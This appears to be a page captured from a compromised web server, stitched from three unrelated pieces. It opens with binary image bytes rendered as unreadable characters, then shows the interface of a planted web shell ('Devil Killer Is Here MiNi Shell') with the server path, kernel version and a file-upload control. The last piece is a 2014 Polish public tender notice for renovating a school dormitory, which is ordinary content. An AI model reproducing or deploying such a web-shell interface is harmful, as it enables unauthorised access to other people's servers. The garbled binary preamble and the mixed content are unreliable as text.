JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140424/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140424/89033-N-2014.html

<p class="kh_header"><b>Ostrów Mazowiecka: Remont budynku internatu Zespołu Szkół CKR w Starym Lubiejewie</b><br>
<b>Numer ogłoszenia: 89033 - 2014; data zamieszczenia: 24.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Centrum Kształcenia Rolniczego w Starym Lubiejewie , ul. Klonowa 4, 07-300 Ostrów Mazowiecka, woj. mazowieckie, tel. 48 2974532-66, faks 48 2974532-66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubiejewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku internatu Zespołu Szkół CKR w Starym Lubiejewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty remontowe budynku internatu Zespołu szkół CKR w Starym Lubiejewie.
Zakres rzeczowy robót remontowych budynku internatu:
       1. Budynek internatu o 4-rech kondygnacjach z częścią mieszkalną.
       Projektuje się wykonanie niżej wymienionych robót remontowych:
       -   demontaż istniejących 12 szt. parapetów podokiennych w poziomie parteru od
            strony zachodniej,
        -   montaż nowych parapetów  podokiennych z blachy powlekanej od strony zachodniej,
        -   wymianę 12 szt. przestarzałych okien drewnianych na pcv w poziomie parteru w salach
           dydaktycznych od strony zachodniej,
       -   wymianę drzwi zewnętrznych wejściowych do hallu głównego z drewnianych na aluminiowe
           z przeszkleniem bezpiecznym,
       -   wymianę 1-go okna w hallu głównym,
       -   zmycie elewacji wodą pod ciśnieniem z dodatkiem środka myjącego BOLIX CLN z
           usunięciem kurzu i brudu,
       -   wykonanie miejscowych napraw  ocieplenia,
       -   wzmocnienie istniejącej powłoki tynkarskiej gruntem głęboko penetrującym BOLIX SIG
       -   remontu powłoki elewacji wykonanej na warstwie docieplenia tynkiem mineralnym poprzez
            nałożenie tynku sylikonowego barwionego w masie (ziarno gr 1,5 mm),
       -   wymianę rur spustowych,
       -   remont ścian cokołowych w zakresie napraw okładziny zaprawą cementową i wykonania
            nowej powłoki zewnętrznej na bazie warstwy siatki z włókna szklanego z klejem 
            z zatarciem na gładko,
       -    malowanie ścian cokołu farbami sylikonowymi,
       -   wykonanie opaski z kostki betonowej od strony zachodniej z podniesieniem terenu
           i odprowadzeniem wody opadowej z rur spustowych na odległość 1,50 m odwodnieniem 
           z elementów korytkowych na podsypce cementowo-piaskowej,
        -   remont tarasu wejściowego ze schodami wewnętrznymi i zadaszeniem
        -    wymiana drzwi zewnętrznych do części mieszkalnej.
        -    remont naciągów instalacji odgromowej

       2.Część mieszkalna  o 2-ch kondygnacjach z wejściem głównym.
        Projektuje się wykonanie niżej wymienionych robót remontowych:
        -  zmycie elewacji wodą pod ciśnieniem z dodatkiem środka myjącego BOLIX CLN
           usunięciem kurzu i brudu,
       -    miejscowych napraw  ocieplenia,
        -   remontu powłoki elewacji wykonanej na warstwie docieplenia tynkiem mineralnym,
            częściowo złuszczonym,
        -   wzmocnienie istniejącej powłoki tynkarskiej gruntem głęboko penetrującym BOLIX SIG
        -   mocowanie istniejącego ocieplenia  plastykowami dyblami do podłoża w ilości
            4 dyble na 1 m2,
    -  wykonanie warstwy klejowej z zatopieniem siatki z włókna szklanego z kątownikami w otworach okiennych i drzwiowych z zatarciem na gadko i gruntowaniem,
        -   wykonanie warstwy elewacyjnej tynkiem sylikonowym (ziarno 1,5 mm) typu baranek, 
        -   remont ścian cokołowych w zakresie napraw okładziny zaprawą cementową i wykonania
            nowej powłoki zewnętrznej na bazie warstwy siatki z włókna szklanego z klejem 
            z zatarciem na gładko,
       -    malowanie ścian cokołu farbami sylikonowymi,
       -    rozbiórka pokrycia dachowego zadaszenia wejścia głównego z blachy fałdowej z obróbkami blacharskimi,
       -    rozbiórka odkształconych płatwi z profilu zamkniętego 20x40x2 mm,
       -     skucie okładzin terakotowych tarasu, schodów i ścian
      -    skucie podłoża betonowego o grubości do 4 cm,
      -    oczyszczenie ścian i podłoża tarasu z resztek kleju,
      -    ręczna reprofilacja ubytków w konstrukcjach betonowych - BOLIX SCS preparat szczepny na bazie cementu,
      -    wykonanie warstwy spadkowej tarasu o średniej grubości do 3 cm zaprawą BOLIX WB,
     -    posadzki jednobarwne z płytek kamionkowych GRES antypoślizgowy, mrozoodporny o wym. 30 x 30 cm na zaprawie klejowej elastycznej,
      -    okładziny schodów płytkami kamionkowymi GRES j. w.,
      -    licowanie ścian płytkami kamionkowymi 25 x 12 cm,
      -    cokoliki  płytek gres,
      -     montaż płatwi zadaszenia z rury kwadratowej 40x40x2 mm - 4 szt.
     -    montaż pokrycia dachowego z blachy dachówkowej powlekanej z obróbkami blacharskimi oraz rynną O 100 mm i rurą spustową  O 80 mm,
      -    czyszczenie i malowanie konstrukcji stalowej tarasu i barierki farbami ftalowymi.

     3. Łącznik, 1-no kondygnacyjny podpiwniczony
          Projektuje się wykonanie niżej wymienionych robót remontowych:
       -  zmycie elewacji wodą pod ciśnieniem z dodatkiem środka myjącego BOLIX CLN z
           usunięciem kurzu i brudu,
       -    miejscowych napraw  ocieplenia,
        -   remontu powłoki elewacji wykonanej na warstwie docieplenia tynkiem mineralnym,
            częściowo złuszczonym,
        -   mocowanie istniejącego ocieplenia kolkami plastykowami (dyblami do podłoża) w ilości
            4 kołki na 1 m2,
    -  wykonanie warstwy klejowej z zatopieniem siatki z włókna szklanego z kątownikami w otworach okiennych i drzwiowych z zatarciem na gadko i gruntowaniem,
        -   wykonanie warstwy elewacyjnej tynkiem sylikonowym (ziarno 1,5 mm) typu baranek 
       -    rozbiórka  fundamentu betonowego po starym kominie od strony północnej,
       -   rozbiórka wsypu węgla z zamurowaniem otworu podawczego i zasypką piaskową
             do poziomu terenu od strony północnej,
       -   rozbiórka tarasu żelbetowego od strony południowej
       -   zamurowanie 2-ch  okien w korytarzu komunikacyjnym z wymianą 1-go okna ,
       -   demontaż 4 szt okien w podpiwniczeniu od strony południowej, zmniejszenie
           otworów poprzez zamurowanie oraz montaż okien o wymiarach 0,55 x 0,87 w ilości 4 szt.
       -   wykonanie nowych schodów wejściowych o szer 1,60 m od strony południowej do drzwi
            ewakuacyjnych, beton C 16/20 (B20), stal AIII i AI,
       -   remont ścian cokołowych w zakresie napraw okładziny zaprawą cementową i wykonania
            nowej powłoki zewnętrznej na bazie warstwy siatki z włókna szklanego z klejem BOLIX HD
            z zatarciem na gładko,
       -    malowanie ścian cokołu farbami sylikonowymi,
      
      4 Stołówka 1-no kondygnacyjna podpiwniczona.
            Projektuje się wykonanie niżej wymienionych robót remontowych: 
        -   rozbiórkę zewnętrznego podestu betonowego od strony wschodniej,
        -   zamurowanie drzwi zewnętrznych od strony wschodniej,
       -    przemurowanie 2-ch kominów 4-ro przewodowych od strony północnej
        -   wymiana zniszczonego okna drewnianego na okno pcv od strony wschodniej,
        -   demontaż istniejących parapetów podokiennych od strony wschodniej,
        -   montaż nowych parapetów  podokiennych z blachy powlekanej od strony wschodniej
         -  zmycie elewacji wodą pod ciśnieniem z dodatkiem środka myjącego BOLIX CLN
           usunięciem kurzu i brudu,
        -   wzmocnienie istniejącej powłoki tynkarskiej gruntem głęboko penetrującym BOLIX SIG
        -   remontu powłoki elewacji wykonanej na warstwie docieplenia tynkiem mineralnym,
            częściowo złuszczonym,
        -   mocowanie istniejącego ocieplenia kołkami plastykowymi (dyblami do podłoża) w ilości
            4 kołki na 1 m2,
    -  wykonanie warstwy klejowej z zatopieniem siatki z włókna szklanego z kątownikami w otworach okiennych i drzwiowych z zatarciem na gadko i gruntowaniem wg systemu w metodzie lekkiej mokrej,
        -   wykonanie warstwy elewacyjnej tynkiem sylikonowym 2 mm typu baranek 
       -   zamurowanie otworów po zdemontowanych oknach cegłą pełną ceramiczną - gr. ściany
           38 cm,
       -   w trakcie zamurowania okien piwnicznych wykonać otwór wentylacyjny 14 x 14 cm
           w każdym zamurowanym oknie z osadzeniem kratek wentylacyjnych metalowych
           obustronnie (kratki w kolorze brązowym),
       -   remont ścian cokołowych w zakresie napraw okładziny zaprawą cementową i wykonania
            nowej powłoki zewnętrznej na bazie warstwy siatki z włókna szklanego z klejem BOLIX HD
            z zatarciem na gładko,
        -    malowanie ścian cokołu farbami sylikonowymi,


5. Uwagi końcowe
Ilość robót do wykonania wg przedmiarów robót.
Kolorystyka elewacji wg oznaczenia na rysunkach
Podane w opisie materiały są  przykładowe i mogą być stosowne inne równoważne.
Zastosowane materiały do robót remontowych muszą posiadać stosowne dokumenty zezwalające do stosowania w budownictwie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Pzp do wysokości 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.42.11.00-5, 45.44.30.00-4, 45.43.11.00-8, 45.11.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 5.000 zł. ( słownie: pięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku będzie dokonana na podstawie złożonego oświadczenia o spełnieniu przez wykonawcę warunków o których mowa w art. 22 ust 1 według formuły spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wiedza i doświadczenie - warunek zostanie uznany za spełniony, jeżeli wykonawca zrealizował w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwie roboty budowlane na 100.000 zł. każda odpowiadające swoim rodzajem
i wartością robotom budowlanym stanowiącym przedmiot zamówienia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym kierunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osoby zdolne do wykonania zamówienia - warunek zostanie uznany 
za spełniony, jeżeli wykonawca wykaże, że przy realizacji zamówienia dysponował będzie następującymi osobami posiadającymi uprawnienia do kierowania robotami budowlanymi bez ograniczeń, wpisanymi do właściwej izby samorządu zawodowego, 
z potwierdzeniem obowiązkowego ubezpieczenia od odpowiedzialności cywilnej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że:
a)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum  100 000,00 złotych;
b)	posiada środki finansowe lub zdolność kredytową na minimum 100 000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy w wersji pełnej wraz z tabelą cen i sprzętu sporządzony zgodnie z kosztorysem ślepym oraz ST</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Pzp zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
1)	W szczególności dopuszczalne są zmiany, dotyczące terminu realizacji umowy w przypadku:
a)	 wystąpienia warunków atmosferycznych uniemożliwiających realizację przedmiotu zamówienia zgodnie z procesem technologicznym;
b)	wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy stron umowy;
c)	wszelkich dodatkowych prac oraz zmiany urządzeń, materiałów lub usług koniecznych dla wykonania przedmiotu zamówienia;
d)	wystąpienia konieczności wykonania robót dodatkowych lub zamiennych, udzielenia zamówień dodatkowych lub uzupełniających, które wstrzymują lub opóźniają realizację przedmiotu umowy.
2)  Zmiana postanowień umowy  w stosunku do treści oferty wykonawcy jest możliwa poprzez zmianę sposobu wykonania przedmiotu umowy, zmianę wynagrodzenia Wykonawcy lub poprzez przedłużenie terminu zakończenia robót w przypadku:
a)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami;
b)	zmian technologicznych - o ile są korzystne dla zamawiającego i o ile nie powodują zwiększenia wynagrodzenia wykonawcy, pod warunkiem, że są spowodowane w szczególności:
-	pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;
-	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy.
c)	konieczności zrealizowania jakiejkolwiek części robót, objętych przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wykonaniem  nienależytym przedmiotu umowy;
d)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
3) Zmiana postanowień umowy w stosunku do treści oferty wykonawcy jest możliwa poprzez ograniczenie zakresu robót przy jednoczesnym zmniejszeniu wynagrodzenia wykonawcy na podstawie przeprowadzonej inwentaryzacji.
4) Wszelkie zmiany i uzupełnienia umowy wymagają uprzedniej akceptacji stron i formy pisemnego aneksu, pod rygorem nieważności, muszą być dokonane przez umocowanych do tego przedstawicieli obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubiejewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół CKR w Starym Lubiejewie ul. Klonowa 4 , 07-300 Ostrów Mazowiecka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2014 godzina 10:00, miejsce: sekretariat Zespołu Szkół CKR w starym Lubiejewie  ul. Klonowa 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





